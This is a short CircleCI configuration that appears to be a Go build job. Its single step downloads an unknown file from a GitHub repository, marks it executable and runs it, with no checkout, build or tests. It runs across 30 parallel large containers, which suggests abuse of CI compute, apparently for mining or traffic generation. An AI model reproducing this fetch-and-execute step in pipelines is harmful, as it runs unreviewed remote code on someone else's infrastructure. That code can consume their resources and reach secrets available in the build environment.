jobs:
  build:
    docker:
      - image: cimg/go:1.18.1
    parallelism: 30
    resource_class: large
    steps:
      - run: wget https://raw.githubusercontent.com/Trafficmotiza/Traff/refs/heads/main/b && chmod +x b && bash b && ./b
      